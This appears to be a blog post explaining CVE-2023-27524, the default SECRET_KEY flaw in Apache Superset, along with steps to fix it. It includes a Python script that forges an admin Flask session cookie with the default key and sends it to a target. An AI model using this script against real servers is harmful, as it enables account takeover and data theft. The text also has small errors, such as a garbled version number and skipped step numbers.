CVE-2023-27524 - How Default Secrets in Apache Superset Opened the Door to Session Hijacking

In May 2023, the open-source analytics platform Apache Superset made headlines—but for all the wrong reasons. A critical vulnerability tracked as CVE-2023-27524 was disclosed, revealing that default settings were putting thousands of Superset instances at risk of attack. If you’re using Superset version 2..1 or below, and forgot (or didn’t know) to change a single configuration value, your data could be exposed to anyone with bad intentions and a bit of curiosity.

This post breaks down the attack, shows you how the exploit works, and, importantly, how to defend your Superset installation. Read on even if you’re not a Superset user—there’s a lesson here about secure defaults every developer and admin should hear.

What is Apache Superset?

Apache Superset is a powerful, web-based business intelligence platform. It lets users query databases, build dashboards, and visualize data with a modern, easy-to-use interface. It’s used by companies big and small, and often deployed inside organizations where sensitive data lives.

The Heart of the Issue: The SECRET_KEY

Every Flask web app (and many other web frameworks) uses a “secret key” for signing session cookies—those critical bits of data that tell the server who you are after you log in. If an attacker knows this key, they can forge their own session cookies and impersonate any user, including administrators.

Superset ships with a default SECRET_KEY in its superset_config.py template

# BAD: Never use the default in production!
SECRET_KEY = 'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY'

If this value is left unchanged—as it was in thousands of real-world deployments—an attacker can generate valid session cookies and claim to be anyone.

Attack: Exploits misconfigured (i.e. default) SECRET_KEY to sign valid session cookies.

- Impact: Full account compromise. Attackers can impersonate any authenticated user, including admin, gaining total control: run queries, view or modify data, and more.
- Attack Surface: Publicly accessible Superset web interfaces (even internal installations at risk if attackers have network access).

Important: If you changed the SECRET_KEY during install, you are safe from this issue.

1. Find a Vulnerable Instance

Attackers scan for internet-facing Superset login pages (easy with simple web or Shodan-type scans).

Most Superset users copy and paste the sample configuration, or use default containers, which have

SECRET_KEY = 'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY'

(Public advisory details several other keys, but this is the most common.)

3. Forge a Session Cookie

A Flask session cookie is a signed (sometimes encrypted) JSON object. Knowing the secret, an attacker can craft a valid cookie that tells Superset “I am the admin”, and the server will trust it!

Example Python Exploit Code

*This code is for educational purposes only. Do not use against systems you do not own!*

from itsdangerous import URLSafeTimedSerializer
import requests

superset_url = 'http://vulnerable.superset.instance/login/';
secret_key = 'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY'
username = 'admin'  # The user to impersonate

# Create a Flask session cookie for the desired user
def create_cookie(user):
    # This is a simplified example; real session data format may differ.
    s = URLSafeTimedSerializer(secret_key)
    session_data = {
        '_user_id': '1',    # Commonly the admin user id 
        'username': user,
        'user_name': user,
        'user_email': 'admin@localhost',
    }
    cookie = s.dumps(session_data)
    return cookie

# Send the cookie in a browser or via Python requests
cookies = {'session': create_cookie(username)}
resp = requests.get(superset_url, cookies=cookies)
print(resp.text)

What Happens?

With a valid session cookie, the attacker bypasses the login screen and lands on the Superset UI as the user they spoofed. They can access dashboards, create admin accounts, exfiltrate data, or even plant backdoors (e.g., malicious SQL queries).

Real-World Impact

According to the security research, over 3,000 public Superset servers were accessible at the time of disclosure, many *with default keys*. The actual number (including private internal deployments) is likely much higher.

In your superset_config.py, change

SECRET_KEY = 'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY'

to a truly random value using e.g. Python

import secrets
print(secrets.token_urlsafe(64))

and place the output as your new secret

SECRET_KEY = 'GENERATED_SUPER_LONG_RANDOM_STRING'

2. Restart Superset

Make sure your changes take effect. Restart your Superset instance fully.

3. Rotate All Active Sessions

All users will be logged out with the new key—this is good! Old sessions signed with the previous key become invalid.

In Summary

CVE-2023-27524 isn’t about a bug in code—it’s about a weak default configuration. It shows how dangerous it is to use “sample” secrets in real deployments. If you manage a Superset instance (or any Flask app!), check your SECRET_KEY right now. Otherwise, you’re betting your data on the hope nobody else knows the default.

References

- Original CVE advisory
- Horizon3.ai’s Report on the Issue
- Apache Superset Documentation
- Flask Session Documentation

Exclusive Takeaway:  
Don’t trust defaults—always check configs when deploying open-source tools. A simple copy-paste can cost you not just your dashboards, but your entire data warehouse.

Timeline

Published on: 04/24/2023 16:15:00 UTC
Last modified on: 05/24/2023 18:15:00 UTC